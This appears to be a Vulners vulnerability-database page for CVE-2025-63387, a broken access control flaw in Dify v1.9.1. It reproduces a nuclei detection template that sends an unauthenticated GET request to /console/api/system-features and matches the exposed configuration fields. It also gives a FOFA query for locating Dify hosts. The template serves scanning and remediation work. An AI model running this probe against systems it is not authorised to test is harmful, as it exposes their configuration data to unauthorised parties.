Lucene search
K

Dify v1.9.1 - Broken Access Control

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 53 Views

Dify v1.9.1 has broken access control exposing system configuration data to unauthenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-63387
18 Dec 202500:00
attackerkb
Circl
CVE-2025-63387
19 Dec 202508:06
circl
CNNVD
dify 安全漏洞
18 Dec 202500:00
cnnvd
CVE
CVE-2025-63387
18 Dec 202500:00
cve
Cvelist
CVE-2025-63387
18 Dec 202500:00
cvelist
EUVD
EUVD-2025-204368
18 Dec 202521:31
euvd
NVD
CVE-2025-63387
18 Dec 202519:16
nvd
OSV
PYSEC-2025-103
18 Dec 202519:16
osv
Positive Technologies
PT-2025-52282
18 Dec 202500:00
ptsecurity
PyPA
PYSEC-2025-103
18 Dec 202519:16
pypa
Rows per page
id: CVE-2025-63387

info:
  name: Dify v1.9.1 - Broken Access Control
  author: DhiyaneshDK
  severity: medium
  description: |
    Dify v1.9.1 contains an insecure permissions vulnerability caused by lack of authorization checks in /console/api/system-features endpoint, letting unauthenticated attackers access sensitive system configuration data.
  impact: |
    Unauthenticated attackers can access sensitive system configuration data, potentially leading to information disclosure.
  remediation: |
    Update to the latest version of Dify.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-63387
  classification:
    cve-id: CVE-2025-63387
    epss-score: 0.28042
    epss-percentile: 0.97867
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Dify"
  tags: cve,cve2025,dify,auth-bypass,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/console/api/system-features"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":'
          - '"sso_enforced_for_signin":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100975218a8a1c653a53c08113ec8d83264257ff350ce619738910da351d798852f02200e282f21d886259f093f5fbe24a5fdbf2fd6b2991d69800f7d8b688dc58e1994:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.28042
SSVC
53